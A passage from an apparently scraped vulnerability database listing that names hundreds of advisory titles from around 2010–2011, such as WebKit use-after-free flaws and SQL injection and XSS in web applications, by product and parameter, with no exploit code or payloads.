Management Center webagent.exe st_upload Request Arbitrary File Upload [70850] Windows Azure SDK Web Role Session Cookies State Information Disclosure [70844] CGI:IRC interfaces/nonjs.pm R Parameter XSS [70808] Kolibri WebServer HTTP Request Header Overflow [70807] XEROX WorkCentre Web Server Unspecified Arbitrary Command Injection [70743] TinyWebGallery admin/index.php Multiple Parameter XSS [70736] Simple Web Content Management System /admin/item_delete.php id Parameter SQL Injection [70732] Opera Unspecified Web Page Content Remote DoS [70691] Linux udev USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70690] Apple Mac OS X USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70688] IBM WebSphere Portal Modified Message Unspecified Information Disclosure [70685] Weborf get_param_value() Function Content-Length HTTP Header Remote Overflow DoS [70669] ActiveWeb Professional EasyEdit.cfm getImagefile Arbitrary File Upload [70616] Advanced Webhost Billing System (AWBS) cart.php oid Parameter SQL Injection [70613] HotWeb Rentals default.asp PageId Parameter SQL Injection [70592] Oracle Sun Convergence Webmail Unspecified Remote Issue [70586] Oracle Sun Products Suite Sun Java System Communications Express Component Web Mail Unspecified Remote Issue [70584] Oracle Fusion Middleware WebLogic Server Servlet Container Unspecified Remote Issue (2010-4453) [70571] Oracle Fusion Middleware WebLogic Server Servlet Container AFSSESSIONID Cookie Session Fixation [70570] Oracle Sun Management Center (SunMC) Web Console Unspecified Remote Information Disclosure [70563] Oracle Supply Chain Products Suite Agile Core Web Client Unspecified Remote Issue [70561] Oracle Fusion Middleware BI Publisher Web Server Unspecified Remote Issue (2010-4427) [70559] Oracle Fusion Middleware BI Publisher Web Server Unspecified Remote Issue (2010-4425) [70531] Oracle Fusion Middleware WebLogic Server Node Manager Unspecified Issue [70516] Oracle Sun Java Communications / Sun Convergence Webmail Unspecified Remote Issue [70476] IBM WebSphere MQ Crafted Message Header Field Remote Overflow [70470] HP OpenView Network Node Manager (OV NNM) ovwebsnmpsrv.exe ovutil.dll stringToSeconds Function Remote Overflow [70466] WebKit Video Handling HTMLVideoElement Bad Cast Memory Corruption [70465] WebKit FrameView::scrollToAnchor Bad Cast Memory Corruption [70461] WebKit SVG Use Element Removal Handling Use-after-free [70456] WebKit CSS Token Sequence CANVAS Element Use-after-free Issue [70454] WebKit Node-iteration Pointer Handling Use-after-free [70438] Ariadne Web Content Management Preview Photo Page idPhoto Parameter SQL Injection [70437] Ariadne Web Content Management Error Message Username Enumeration [70428] Sybase EAServer Unspecified Arbitrary Web Service Remote Installation [70415] Symantec Web Gateway login.php USERNAME Parameter SQL Injection [70406] Webform Module for Drupal Unspecified SQL Injection [70396] NTWebServer NTWebServer.exe HTTP Request Remote Overflow [70391] Microsoft IE MSHTML.DLL ReleaseInterface Function Use-after-free Arbitrary Code Execution [70389] RoomWizard Admin Interface /admin/sign/DeviceSynch Sync Connector AD Credentials Disclosure [70387] IBM WebSphere Application Server (WAS) Administrative Console Direct Request Remote Information Disclosure [70386] IBM WebSphere Application Server (WAS) Servlet Engine / Web Container Missing Error Page XSS [70385] IBM WebSphere MQ Invalid Queue Message Overflow [70359] Cisco Adaptive Security Appliances (ASA) TELNET Connection Interface Remote Access Restriction Bypass [70357] Cisco Adaptive Security Appliances (ASA) emWEB Document Name Space Character Remote DoS [70354] Cisco Adaptive Security Appliances (ASA) WebVPN CIFS Share Access Restriction Bypass [70259] IBM Tivoli Access Manager WebSEAL Shift-reload Action Remote DoS [70231] IBM Rational ClearQuest Web Client URL RECORD Action Number Restricted User Limitation Bypass [70216] Academic Web Tools browse.php a_code Parameter XSS [70214] iSpot/Clearspot webmain.cgi Multiple Admin Function CSRF [70159] Django django.contrib.admin Admin Interface query String Information Disclosure [70158] IBM Tivoli Access Manager for e-business WebSEAL URL Traversal Arbitrary File Access [70135] OpenEMR interface/patient_file/summary/pnotes_full.php note Parameter XSS [70134] OpenEMR interface/patient_file/summary/add_edit_issue.php issue Parameter SQL Injection [70133] OpenEMR interface/main/calendar/index.php pc_facility Parameter SQL Injection [70132] OpenEMR interface/patient_file/summary/demographics.php set_pid Parameter SQL Injection [70131] OpenEMR interface/patient_file/summary/immunizations.php administered_by_id Parameter SQL Injection [70130] OpenEMR interface/patient_file/summary/pnotes_full.php Multiple Parameter SQL Injection [70129] OpenEMR interface/patient_file/summary/immunizations.php Multiple Parameter XSS [70128] web@all Multiple Admin Function CSRF [70125] CMS WebManager-Pro /admin/files.php Arbitrary File Upload [70106] WebKit SVG Cursor Element Handling Use-after-free [70105] WebKit CSSParser::parseFontFaceSrc CSS Font Face Parsing Type Confusion [70086] Embedthis Appweb Ejscript Web Framework XSS [70072] Oracle Communications Messaging Server Webmail Kerberos AP-REQ Remote DoS [70065] Oracle Communications Messaging Server Webmail Unspecified Remote Issue (2010-3575) [70027] Oracle iPlanet Web Server WebDAV Unspecified Remote Information Disclosure [70026] Oracle iPlanet Web Server Administration Cross-site Request Forgery (2010-3544) [70025] Oracle iPlanet Web Server Administration Unspecified Remote Issue (2010-3545) [70024] Oracle iPlanet Web Server Web Container Remote HTTP Header Insertion [70011] Opera WebSockets Unspecified Remote Issue [70008] Opera Web Page Security Indication Display Weakness [70004] Opera Web Page Content Dialog Box Focus Weakness [69942] Microsoft WMI Administrative Tools WEBSingleView.ocx ActiveX Remote Code Execution [69934] Mitel Audio and Web Conferencing (AWC) awcuser/cgi-bin/vcs xsl Parameter Arbitrary Command Injection [69929] Gitweb index.php Multiple Parameter XSS [69916] LiteSpeed Web Server HTTP Header LSAPI PHP Extension Processing Overflow [69915] Seo Panel backlinks.php website_id Parameter SQL Injection [69914] Seo Panel cron.php website_id Parameter SQL Injection [69909] Seo Panel rank.php website_id Parameter SQL Injection [69908] Seo Panel saturationchecker.php website_id Parameter SQL Injection [69905] Seo Panel website.php Multiple Parameter SQL Injection [69898] Seo Panel saturationchecker.php website_urls Parameter XSS [69897] Seo Panel backlinks.php website_urls Parameter XSS [69896] Seo Panel websites.php pageno Parameter XSS [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69784] Orion Network Performance Monitor InterfaceDetails.aspx NetObject Parameter XSS [69761] WordPress XML-RPC Interface Access Restriction Bypass [69758] Mozilla Firefox WebSockets Proxy Upgrade Negotiation Weakness [69690] IceWarp Server webmail/basic/ Multiple Parameter XSS [69689] IceWarp Server webmail/basic/minimizer/index.php script Parameter Traversal Arbitrary File Access [69688] IceWarp Server webmail/basic/index.html _c Parameter Traversal Arbitrary File Access [69672] WebKit 'EventHandler::updateSelectionForMouseDrag' Mouse Drag Event Use-after-free [69671] WebKit SMILTimeContainer::updateAnimations SVG Animation Update Use-after-free [69670] Google Chrome WebDevToolsFrontendImpl.cpp Privileged Extensions Restriction Weakness Use-after-free [69668] Google Chrome WebM Video Out-of-bounds Read Remote DoS [69654] IBM WebSphere Commerce Enterprise RunTimeProfileCacheCmdImpl Outbound Messaging System Message Disclosure [69650] pfSense interfaces.php if Parameter XSS [69636] WebEx Meeting Manager WebexUCFObject ActiveX Path Subversion Arbitrary DLL Injection Code Execution [69600] HP Palm WebOS Contacts Application Crafted vCard XSS [69586] VMware Server Web Access Traversal Arbitrary File Access [69581] RV Dealer Website showAlllistings.asp orderBy Parameter SQL Injection [69580] RV Dealer Website search.asp selStock Parameter SQL Injection [69579] Web Wiz NewsPad database/NewsPad.mdb Direct Request Database Disclosure [69561] IBM WebSphere MQ Internet Pass-Thru TLS Renegotiation Handshake MiTM Plaintext Data Injection [69532] Kerio Control Web Filter Unspecified Issue [69497] Apple iOS WebKit Mail DNS Prefetch LINK Element Image Loading Setting Bypass [69484] TinyWebGallery i_frames/i_top_tags.php Multiple Parameter XSS [69483] TinyWebGallery i_frames/i_titel.php Multiple Parameter XSS [69482] TinyWebGallery i_frames/i_slideshowjquery.php Multiple Parameter XSS [69481] TinyWebGallery i_frames/i_search.php Multiple Parameter XSS [69480] TinyWebGallery i_frames/i_rate.php Multiple Parameter XSS [69479] TinyWebGallery i_frames/i_privatelogin.php Multiple Parameter XSS [69478] TinyWebGallery i_frames/i_optionen.php Multiple Parameter XSS [69477] TinyWebGallery i_frames/i_login.php Multiple Parameter XSS [69476] TinyWebGallery i_frames/i_info.php Multiple Parameter XSS [69475] TinyWebGallery i_frames/i_kommentar.php twg_name Parameter XSS [69474] TinyWebGallery i_frames/i_tags.php Multiple Parameter XSS [69473] TinyWebGallery index.php Multiple Parameter XSS [69472] TinyWebGallery admin/index.php Multiple Parameter XSS [69471] webApp.secure Content-Length Header NULL Dereference DoS [69454] Linux Kernel drivers/tty/tty_buffer.c flush_to_ldisc() Function TTY Interface Local DoS [69446] Cisco Unified Videoconferencing (UVC) Multiple Products goform/websXMLAdminRequestCgi.cgi username Field Arbitrary Shell Command Injection [69444] WebKit SVG Document Color Processing Bad Cast Arbitrary Code Execution [69443] WebKit SVG Use Element Use-after-free Arbitrary Code Execution [69442] WebKit Geolocation Objects Use-after-free Arbitrary Code Execution [69440] WebKit CSS Token Sequence :first-letter Pseudo-element Handling Arbitrary Code Execution [69439] WebKit Editable Element Processing Uninitialized Memory Access Arbitrary Code Execution [69438] WebKit CSS Box Processing Unspecified Variable Casting Arbitrary Code Execution [69437] WebKit Inline Text Box Use-after-free Arbitrary Code Execution [69436] WebKit CSS 3D Transform Unspecified Variable Casting Arbitrary Code Execution [69435] WebKit Hidden IFrame Custom Scrollbar Image Loading Use-after-free Arbitrary Code Execution [69434] WebKit HTMLLinkElement::process DNS Prefetch Setting Bypass [69433] WebKit 'Text::wholeText' Function Size Calculation Integer Overflow [69432] WebKit Element Attribute Use-after-free Arbitrary Command Execution [69430] WebKit Inline Styling Unspecified Variable Casting Arbitrary Code Execution [69427] WebKit JavaScript Random Number Generation Algorithm Weakness [69426] WebKit Crafted String Handling Unspecified Overflow [69350] Ricoh Aficio Multiple Products Web Image Monitor Unspecified XSS [69338] HP LoadRunner LoadRunner Web Tours login.pl Username Specifier Traversal Arbitrary File Upload [69334] Camtron / TecVoz CMNC-200 IP Camera Web Server Request Saturation Remote DoS [69332] Camtron / TecVoz CMNC-200 IP Camera Admin Interface URI Double Slash Remote Authentication Bypass [69331] Camtron / TecVoz CMNC-200 IP Camera Admin Interface URI Traversal Arbitrary File Access [69274] openEngine cms/website.php template Parameter XSS [69273] openEngine cms/website.php template Parameter Traversal Arbitrary File Access [69268] HP LaserJet Printers PJL Interface Unspecified Traversal Arbitrary File Access [69252] IBM WebSphere MQ Unspecified Disk Consumption Remote DoS [69245] IBM OmniFind Admin Interface SID IP Address Restriction Weakness Session Impersonation [69244] IBM OmniFind Admin Interface Login Form SID Replay Session Fixation [69232] Babylon Translation Interface Search XSS [69229] IBM WebSphere MQ Security Parameters Field Cleartext Credentials Weakness [69215] USAA Application for Android Visited Web Page Mirror Image Storage Information Disclosure [69214] IBM WebSphere Application Server (WAS) Web Services Security Crafted JAX-WS Request Remote DoS [69212] HP LoadRunner LoadRunner Web Tours Unspecified Remote DoS [69211] HP Palm webOS Camera Application Unspecified Arbitrary File Overwrite [69210] HP Palm webOS Service API Unspecified Service Call Local Privilege Escalation [69209] HP Palm webOS Doc Viewer Crafted Word Document Arbitrary Code Execution [69204] IBM WebSphere Application Server (WAS) Administrative Console Integrated Solution Console Unspecified XSS [69203] IBM WebSphere Portal SemanticTagService.js Unspecified Parameter XSS [69202] IBM WebSphere Commerce Sample Store Pages XSS [69201] IBM WebSphere Commerce Organization Admin Console JavaServer Page SQL Injection [69172] WebKit FEBlend::apply SVG Invalid Blend Mode Handling Array Indexing Code Execution [69170] WebKit FrameLoader::loadWithDocumentLoader Destroyed Frame Use-after-free [69169] libvpx WebM Video Invalid Frame Parsing Memory Corruption [69165] WebKit SVG Document use Element Bad Cast Memory Corruption [69164] WebKit RootInlineBox::alignBoxesInBlockDirection Text Area Handling Memory Corruption [69163] WebKit Rich Text Editing Use-after-free Issue [69144] Novell GroupWise WebAccess WebPublisher Unspecified XSS [69103] WeBid confirm.php id Parameter XSS [69102] WeBid includes/messages.inc.php lan Parameter Traversal Arbitrary File Access [69094] Microsoft Forefront Unified Access Gateway (UAG) Mobile Portal Website Unspecified XSS [69056] Oracle Java SE / Java for Business Web Start Component Unspecified Issue (2010-3550) [69048] Oracle Java SE / Java for Business Web Start Component Unspecified Issue (2010-3558) [69043] Oracle Java SE / Java for Business Web Start BasicServiceImpl Class Arbitrary Code Execution [69007] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2010-0783) [69000] MySQL HANDLER Interface Unspecified READ Request DoS [68973] XWiki Watch xwiki/bin/viewrev/Main/WebHome rev Parameter XSS [68954] Oracle WebLogic Node Manager Service Arbitrary File Access [68930] IBM ENOVIA Web Services Unspecified Issue [68922] Weborf HTTP Invalid Request Handling DoS [68894] IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS [68870] Linux Kernel i915 DRM Subsystem GEM drivers/gpu/drm/i915/i915_gem.c IOCTL Interface Arbitrary Kernel Memory Write [68866] Ettercap src/interfaces/gtk/ec_gtk_conf.c gtkui_conf_read() Function Local Overflow [68843] WebKit Attr Node Modification Document.getElementById Malfunction Use-after-free [68841] WebKit Large Animated GIF Handling Missing Return Value Check Memory Corruption [68839] Google Chrome Web Sockets Shutdown Action Unspecified DoS [68838] WebKit Asynchronous History Navigation Pop-up Blocker Bypass Weakness [68831] Opera Unspecified Web Script Reload / Redirect Restriction Weakness [68758] CMS WebManager-Pro index.php content_id Parameter SQL Injection [68754] IBM WebSphere MQ X.509 Certificate Crafted Subject Distinguished Name (DN) Spoofing Weakness [68732] NETGEAR CG3000/CG3100 Cable Gateway NETGEAR_SE User Interface Access Permissions Bypass [68724] Intellicom NetBiter webSCADA WS100/WS200 cgi-bin/read.cgi Unspecified Arbitrary File Upload [68723] Intellicom NetBiter webSCADA WS100/WS200 cgi-bin/read.cgi file Parameter Absolute Path Arbitrary File Access [68722] Intellicom NetBiter webSCADA WS100/WS200 cgi-bin/read.cgi page Parameter Traversal Arbitrary File Access [68710] Adobe RoboHelp for Word WebHelp Unspecified XSS [68637] Attachmate Reflection for the Web Unspecified XSS [68627] OpenConnect Debug Output webvpn Cookie Value Remote Information Disclosure [68537] IBM WebSphere Application Server for z/OS Unspecified CSRF [68536] IBM WebSphere Application Server for z/OS Unspecified XSS [68534] Xweblog arsiv.asp tarih Parameter SQL Injection [68533] Xweblog oku.asp makale_id Parameter SQL Injection [68365] WebKit rendererIsNeeded SVG Document Handling Bad Cast Memory Corruption [68362] Apple Safari on Windows Webkit.dll Malformed SGV Text Style Handling DoS [68356] Webmatic index.php Multiple Parameter XSS [68323] SurgeMail SurgeWeb /surgeweb username_ex Parameter XSS [68311] Your Own Personal [WEB] Server (YOPS) http_parse_request_header Function Remote Overflow [68282] webSPELL shoutbox_content.php Unspecified Parameter SQL Injection [68281] webSPELL contact.php Unspecified Parameter Arbitrary Email Address Injection [68280] webSPELL clanwars_details.php cwID Parameter SQL Injection [68279] webSPELL asearch.php search Parameter SQL Injection [68278] CMS WebManager-Pro c.php id Parameter SQL Injection [68277] CMS WebManager-Pro c.php url Parameter Arbitrary Site Redirect [68272] WebSiteAdmin ADMIN/login.php lng Parameter Traversal Local File Inclusion [68184] SkyBlueCanvas Admin Interface User Password Manipulation CSRF [68183] @mail Webmail Client index.php/mail/auth/processlogin MailType Parameter XSS [68168] IBM WebSphere Application Server (WAS) Admin Console Crafted URL Unspecified Remote DoS [68161] OmniTouch Contact Center TSA Server Tsa_Maintainance.exe Admin Interface Access Restriction Bypass [68117] NitroView ESM Management Interface Unspecified Arbitrary File Access [68103] WebKit Invalid Pending Resource Pattern SVG Handling Use-after-free Issue [68102] WebKit SVG Style Use-after-free Arbitrary Code Execution [68101] WebKit Document API Parsing Use-after-free Issue [68084] Symphony CMS articles/a-primer-to-symphony-2s-default-theme/ fields[website] Parameter XSS [68044] IBM Lotus Sametime Connect Webcontainer Implementation Unspecified Issue [68008] IBM Proventia Network Mail Security System Local Management Interface load.php javaVersion Parameter CRLF Injection [68007] IBM Proventia Network Mail Security System Local Management Interface sla/index.php l Parameter Traversal Arbitrary File Access [68006] IBM Proventia Network Mail Security System Local Management Interface Multiple CSRF [68005] IBM Proventia Network Mail Security System Local Management Interface Saved Search Filter XSS [68004] IBM Proventia Network Mail Security System Local Management Interface Unspecified Stored Data XSS [68003] IBM Proventia Network Mail Security System Local Management Interface sla/index.php l Parameter XSS [68002] IBM Proventia Network Mail Security System Local Management Interface pvm_smtpstore.php action Parameter XSS [68001] IBM Proventia Network Mail Security System Local Management Interface pvm_cert_serveraction.php action Parameter XSS [68000] IBM Proventia Network Mail Security System Local Management Interface pvm_cert_commaction.php action Parameter XSS [67999] IBM Proventia Network Mail Security System Local Management Interface sys_tools.php ping Parameter XSS [67998] IBM Proventia Network Mail Security System Local Management Interface pvm_user_management.php userfilter Parameter XSS [67997] IBM Proventia Network Mail Security System Local Management Interface pvm_messagestore.php date1 Parameter XSS [67962] WebKit JavaScriptCore Floating Point Data Handling Non-Standard NaN Memory Corruption [67933] WebKit FrameView::detachCustomScrollbars Scrollbar Handling Use-after-free [67932] WebKit SelectElement::setSelectedIndex Form Menu Handling Bad Cast Memory Corruption [67930] WebKit SelectionController::updateAppearance Selection Handling Use-after-free [67926] WebKit RenderBlock::layoutBlock Inline Element Rendering Double-free [67915] openSUSE Novell Client novfs /proc Interface Multiple Unspecified Overflow [67873] Beehive Forum admin.php webtag Parameter XSS [67872] Beehive Forum logon.php webtag Parameter XSS [67871] Beehive Forum pm.php webtag Parameter XSS [67870] Beehive Forum post.php webtag Parameter XSS [67869] Beehive Forum index.php webtag Parameter XSS [67867] WebKit Image Read Access Restriction Same Origin Policy Bypass Remote Information Disclosure [67865] WebKit FocusController::setFocusedNode Element Focus Handling Use-after-free [67863] WebKit findPlaceForCounter Counter Node Handling Memory Corruption [67862] WebKit WebSockets Implementation Input Parsing Memory Corruption [67859] Google Chrome WebSockets Implementation Socket Stream Closing During Host Resolution Handling DoS [67845] SUSE Linux Enterprise yast2-webclient WebYaST Appliance Fixed Secret Key Session Cookie Spoofing Weakness [67840] Weborf instance.c modURL Function Traversal Arbitrary File Access [67831] MicroNetSoft Rental Property Management Website detail.asp ad_ID Parameter SQL Injection [67830] RV Dealer Website detail.asp vehicletypeID Parameter SQL Injection [67725] QtWeb Browser Path Subversion Arbitrary DLL Injection Code Execution [67691] Wiccle Web Builder ajax.php post_text Parameter XSS [67656] Sniper_SA Web Backdoor Unspecified Remote File Disclosure [67631] Firebook Admin Interface param Parameter Path Disclosure [67630] Firebook Admin Interface param Parameter Traversal Arbitrary File Access [67628] Firebook Admin Interface URLproxy Parameter XSS [67627] 2Wire Router HTTP Admin Interface Default Password [67570] IBM WebSphere Application Server (WAS) JAX-WS WS-Security Policy Time Stamp Value Unspecified Issue [67536] Webmatic Multiple Admin Function CSRF [67486] phpMyAdmin libraries/database_interface.lib.php Unspecified Parameter XSS [67467] WebKit Geolocation Activity Start Frame Disconnect Use-after-free Issue [67466] WebKit Ruby Support Child Removal Use-after-free [67462] WebKit MIME Type Handling PluginData Page Pointer Page Destruction Use-after-free [67461] WebKit History::urlForState History State Methods Address Bar Spoofing [67460] WebKit Bad Cast Invalid Text Node Text Editing Memory Corruption [67459] WebKit SVG DeleteButtonController Enable State Change Use-after-free [67415] GFI Web Monitor Proxy Port Unspecified XSS [67411] Novell iPrint Client op-client-interface-version Operation call-back-url Parameter Remote Overflow [67364] Splunk Server splunkweb Default Administrator Account [67344] Cisco WebEx Player ARF File Handling Overflow [67342] Simple Web Server (SWS) Malformed From Header Remote DoS [67340] Baby ASP Web Server Connection Saturation Remote DoS [67337] Quick 'n Easy Web Server Connection Saturation Remote DoS [67296] WebKit loader/DocumentThreadableLoader.cpp XMLHttpRequest Cross-origin Request Credential Handling Weakness [67295] WebKit page/Geolocation.cpp lastPosition Function Access Restriction Weakness [67262] Palm Pre WebOS vCard Handling Arbitrary Code Execution [67261] Palm Pre WebOS Multiple Unspecified Issues [67260] i-Web Suite default.asp Multiple Parameter SQL Injection [67259] i-Web Suite default.asp errmsg Parameter XSS [67212] KnowledgeTree Web Service Document Upload Manager ktwebservice/KTUploadManager.inc.php Arbitrary File Upload [67211] Ezyweb insert.image.php Arbitrary PHP File Upload [67210] Ezyweb loginvalid.php Multiple Parameter SQL Injection [67145] Asterisk Recording Interface recording_popup.php date Parameter XSS [67144] Asterisk Recording Interface page.ampusers.php Administrative Action CSRF [67143] Asterisk Recording Interface voicemail.module preg_match Function Path Disclosure [67142] Asterisk Recording Interface voicemail.module selected7 Parameter Arbitrary File Access [67141] NuralStorm Webmail settings.php Arbitrary File Write [67140] NuralStorm Webmail problems.php Arbitrary Mail Relay [67139] NuralStorm Webmail maintenance.php UPLOAD_DIR Parameter Arbitrary File Deletion [67138] NuralStorm Webmail book_include.php BGCOLOR Parameter XSS [67137] NuralStorm Webmail book.php Arbitrary User Addressbook Disclosure [67136] NuralStorm Webmail Multiple Action CSRF [67135] NuralStorm Webmail Crafted COOKIE_SESSSION Arbitrary File Upload [67134] NuralStorm Webmail Addressbook Functionality Multiple XSS [67119] Microsoft Outlook Web Access (OWA) Multiple Function CSRF [67101] Gekko Web Builder /admin/index.php app Parameter XSS [67078] EJBCA Admin Interface Unspecified XSS [67027] SopCast WebPlayer sopocx.ocx ActiveX sop:// URL ChannelName Property Overflow [67025] Cisco Unified Wireless Network (UWN) Solution WEBAUTH_REQD State WLAN Traffic Remote Access Restriction Bypass [67022] Cisco Unified Wireless Network (UWN) Solution Virtual Interface Ping Remote DoS [66932] HP OpenView Network Node Manager (OV NNM) webappmon.exe OvJavaLocale Cookie Value Handling Remote Overflow [66928] Cisco Wireless Control System webacs/QuickSearchAction.do searchText Parameter XSS [66922] IBM WebSphere Service Registry and Repository ServiceRegistry/QueryWizardProcessStep1.do queryItems[0].value Parameter XSS [66921] IBM WebSphere Service Registry and Repository ServiceRegistry/HelpSearch.do searchTerm Parameter XSS [66857] WebKit SVGFontFaceElement Destructor Element Handling Use-after-free [66856] WebKit emitDisjunction Regular Expression Interpretation Memory Corruption [66855] WebKit JavaScript Array Signed Integer Overflow Memory Corruption [66854] WebKit JIT Compiled JavaScript Stub Reentrancy Issue Arbitrary Code Execution [66853] WebKit JavaScript Single Character String Replacement Overflow [66852] Webkit SVGElement::attributeChanged SVG Attribute Synchronization Memory Corruption [66851] WebKit SVG Floating Element Layout Handling Invalid Cast Memory Corruption [66850] WebKit SVG foreignObject Element Layout Rendering Use-after-free [66849] WebKit SVG Text Multiple Pseudo-elements Uninitialized Memory Access [66848] WebKit RenderWidget::destroy CSS Rendering Counter Use-after-free [66847] WebKit Layout Text Node Dynamic Modification Memory Disclosure [66846] WebKit createBidiRunsForLine Inline Element Rendering Memory Corruption [66845] WebKit Element::focus Element Focus Change Use-after-free [66841] QtDemoBrowser webview.cpp Nonexistent Domain Name XSS [66840] kwebkitpart webkitpart.cpp Nonexistent Domain Name XSS [66824] Apple Mac OS X WebDAV Kernel Extension webdav_vfsops.c webdav_mount Function Local DoS [66814] Amlib Amlibweb Library Management System webquery.dll app Parameter Overflow [66785] Akamai Download Manager ActiveX Crafted Web Page Arbitrary File Download [66766] phpMyAdmin Extension for TYPO3 Database Admin Interface Crafted URL Restriction Bypass [66748] WebKit Layer Continuation Outlines Painting Memory Corruption [66662] Nessus Web Server /feed Method Direct Request Version Information Disclosure [66661] Nessus Web Server nessusd_www_server.nbin Unspecified XSS [66638] Wing FTP Server Web Client Unspecified Arbitrary File Access [66622] Novell GroupWise WebAccess Component Unspecified Javascript XSS [66619] Novell GroupWise WebAccess Component Unspecified Form Parameter Header Injection XSS [66618] Novell GroupWise WebAccess Component User Proxy Overflow [66617] Novell GroupWise WebAccess Component Unspecified Authentication Information Disclosure [66616] Novell GroupWise WebAccess Component HTML Message XSS [66615] Novell GroupWise WebAccess Component Unspecified XSS [66599] Mozilla Multiple Products importScripts Web Worker Method Cross-origin Data Disclosure [66592] Mozilla Multiple Browsers NodeIterator Interface Javascript Callback Use-After-Free Code Execution [66585] LILDBI-WEB e/admin/uploader.php Arbitrary File Upload [66515] mlmmj on Debian Administrative Interface Traversal Arbitrary File Deletion [66511] Pre Podcast Portal Partner Login Interface password Parameter SQL Injection [66480] WebKit WebCore websockets/WebSocketHandshake.cpp WebSocketHandshake::readServerHandshake Function Off-by-one Remote DoS [66455] TopManage SAP Web Module OLK /olk/c_p/searchCart.asp Multiple Field SQL Injection [66453] InterScan Web Security Virtual Appliance /login_account_add_modify.jsp desc Parameter XSS [66452] InterScan Web Security Virtual Appliance /servlet/com.trend.iwss.gui.servlet.MetricSetting Multiple Parameter XSS [66369] Oracle Sun Java System Web Proxy Server Administration Server Unspecified Remote Issue (2010-2385) [66359] Oracle Fusion Middleware WebLogic Server Component Plugin URL Response Splitting Trusted Header Injection [66271] WebDM CMS cont_form.php cf_id Parameter SQL Injection [66260] Open Web Analytics index.php Multiple Parameter Traversal Arbitrary File Access [66258] BrotherScripts Recipe Website recipedetail.php id Parameter SQL Injection [66226] Apache Axis2 Admin Interface Cookie Session Fixation [66191] SOGo Web Calendar Arbitrary Private Event Access [66047] WebKit Pasteboard::writeImage Invalid Image Copying NULL Pointer Dereference DoS [66043] WebKit WebGL WebGLUnsignedIntArrayInternal::getCallback Out-of-bounds Read Memory Disclosure [65979] WebDB index.asp qt Parameter SQL Injection [65978] WebDB Search Functionality Multiple Parameter SQL Injection [65973] Trend Micro InterScan Web Security Virtual Appliance uihelper Local Privilege Escalation [65930] webERP Admin Password Manipulation CSRF [65890] Cisco Adaptive Security Appliances (ASA) WebVPN Unspecified XSS [65889] Cisco Adaptive Security Appliances (ASA) WebVPN +webvpn+/index.html Redirect CRLF Injection [65876] WebsiteBaker admin/login/index.php username Parameter XSS [65875] WebsiteBaker admin/preferences/details.php display_name Parameter XSS [65874] WebsiteBaker modules/form/save_field.php title Parameter XSS [65873] WebsiteBaker admin/preferences/details.php Multiple Parameter SQL Injection [65872] WebsiteBaker admin/pages/add.php Multiple Parameter SQL Injection [65871] WebsiteBaker admin/pages/settings2.php Multiple Parameter SQL Injection [65870] WebsiteBaker admin/pages/sections.php module Parameter SQL Injection [65869] WebsiteBaker admin/modules/details.php file Parameter Traversal File Enumeration [65868] WebsiteBaker admin/templates/details.php file Parameter Traversal File Enumeration [65867] WebsiteBaker admin/preferences/details.php language Parameter Traversal Arbitrary File Access [65866] WebsiteBaker admin/languages/details.php code Parameter Traversal Arbitrary File Access [65865] WebsiteBaker admin/pages/settings2.php template Parameter Traversal Arbitrary File Access [65864] WebsiteBaker admin/pages/add.php type Parameter Traversal Arbitrary File Access [65799] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2010-0779) [65798] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2010-0778) [65778] Trend Micro InterScan Web Security Virtual Appliance login_account_add_modify.jsp New Admin Addition CSRF [65777] Trend Micro InterScan Web Security Virtual Appliance com.trend.iwss.gui.servlet.urllistset URL Block List Site Addition CSRF [65776] Trend Micro InterScan Web Security Virtual Appliance servlet/com.trend.iwss.gui.servlet.XMLRPCcert filename Traversal Arbitrary File Upload [65775] Trend Micro InterScan Web Security Virtual Appliance servlet/com.trend.iwss.gui.servlet.ConfigBackup pkg_name Parameter Arbitrary File Access [65774] Trend Micro InterScan Web Security Virtual Appliance servlet/com.trend.iwss.gui.servlet.exportreport exportname Parameter Traversal Arbitrary File Access [65756] EJBCA Admin Interface Multiple Unspecified XSS [65748] 2daybiz Web Template customize.php tid Parameter SQL Injection [65747] 2daybiz Web Template memberlogin.php password Parameter XSS [65746] 2daybiz Web Template category.php keyword Parameter XSS [65738] Novell iManager /nps/servlet/webacc/ Tree Parameter Off-by-One Remote DoS [65737] Novell iManager /nps/servlet/webacc/ Multiple Parameter Overflow [65732] Atlassian JIRA Bamboo Plugin Multiple Interface XSS [65700] WebKit history.replaceState Cross-Origin Parent Frame Information Disclosure [65679] Weborf HTTP Header Wide Character Handling Remote DoS [65673] IBM WebSphere ILOG JRules faces/home.jsp scripts URI XSS [65672] IBM WebSphere ILOG JRules faces/compose/compose.jsp URI XSS [65671] IBM WebSphere ILOG JRules faces/explore/explore.jsp URI XSS [65668] Groupmax World Wide Web Desktop Products Unspecified XSS [65660] H264WebCam GET Request NULL Dereference Remote DoS [65657] WebKit JavaScriptCore Page Transition Handling Use-after-free Issue [65656] WebKit 'document.write()' Tokenizer Handling Memory Corruption [65655] WebKit Unspecified Issue (2010-1769) [65653] IBM WebSphere Application Server (WAS) on z/OS default_create.log BBOWWPFx Job / zPMT Profile Creation Information Disclosure [65652] IBM WebSphere Application Server (WAS) on z/OS Unspecified Link Injection [65651] IBM WebSphere Application Server (WAS) on z/OS Admin Console Unspecified XSS [65650] IBM WebSphere Application Server (WAS) HTTP Channel gzip Chunked Data NullPointerException DoS [65645] WebsiteBaker Hidden Form CSRF [65636] Moodle lib/weblib.php Unspecified Parameter XSS [65634] Moodle MNET Access Control Interface XSS [65613] SAP J2EE Engine Telnet Interface SMB Relay Authentication Bypass [65609] Travel Website Script / Easy Travel Portal tour_packages.asp country Parameter SQL Injection [65556] Apple Mac OS X Ruby WEBrick HTTP Server UTF-7 Error Page XSS [65552] HP OpenView Network Node Manager (OV NNM) ovwebsnmpsrv.exe jovgraph.exe CGI main() Function Remote Code Execution [65547] Joke Website Script search.php keyword Parameter SQL Injection [65546] Joke Website Script search.php keyword Parameter XSS [65545] e-Book Store Website Script search.php keyword Parameter SQL Injection [65544] SasCAM Webcam Server HTTP GET Request Remote DoS [65526] Accoria Web Server servercfg.cgi dns Parameter XSS [65525] Accoria Web Server httpdcfg.cgi name Parameter XSS [65524] Accoria 